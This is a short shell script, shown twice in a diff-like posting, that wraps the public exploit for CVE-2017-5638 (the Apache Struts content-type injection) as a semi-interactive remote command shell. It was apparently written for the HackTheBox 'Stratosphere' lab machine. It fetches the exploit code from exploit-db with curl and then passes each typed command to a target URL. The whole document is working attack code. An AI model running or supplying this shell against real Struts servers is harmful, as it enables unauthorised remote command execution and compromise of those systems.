chrispetrou · August 13, 2019 14:19
diff --git a/CVE-2017-5638.sh b/CVE-2017-5638.sh
 #!/bin/sh

 # A semi-interactive shell for the CVE-2017-5638 exploit
 # (it is actually a wrapper of the CVE-2017-5638 exploit)
 # which simply makes the shell a bit more functional.
 # used on HackTheBox, stratosphere machine: http://10.10.10.64/Monitoring/example/Welcome.action

 if [ ! -z "$1" ]; then
    url=$1
 else
    echo "Usage: $0 <url>"
    exit
 fi

 if [ ! -f 41570.py ] && [ ! -r 41570.py ] && [ ! -s 41570.py ]; then
    curl -o 41570.py https://www.exploit-db.com/raw/41570
 fi

 while true ; do
    read -p '[cmd]: ' cmd
    if [ ! -z "$cmd" ]
    then
        python 41570.py $url "$cmd" | while read line ; do
            echo $line
        done
    fi
 done
	#!/bin/sh

	# A semi-interactive shell for the CVE-2017-5638 exploit
	# (it is actually a wrapper of the CVE-2017-5638 exploit)
	# which simply makes the shell a bit more functional.
	# used on HackTheBox, stratosphere machine: http://10.10.10.64/Monitoring/example/Welcome.action

	if [ ! -z "$1" ]; then
	url=$1
	else
	echo "Usage: $0 <url>"
	exit
	fi

	if [ ! -f 41570.py ] && [ ! -r 41570.py ] && [ ! -s 41570.py ]; then
	curl -o 41570.py https://www.exploit-db.com/raw/41570
	fi

	while true ; do
	read -p '[cmd]: ' cmd
	if [ ! -z "$cmd" ]
	then
	python 41570.py $url "$cmd" \| while read line ; do
	echo $line
	done
	fi
	done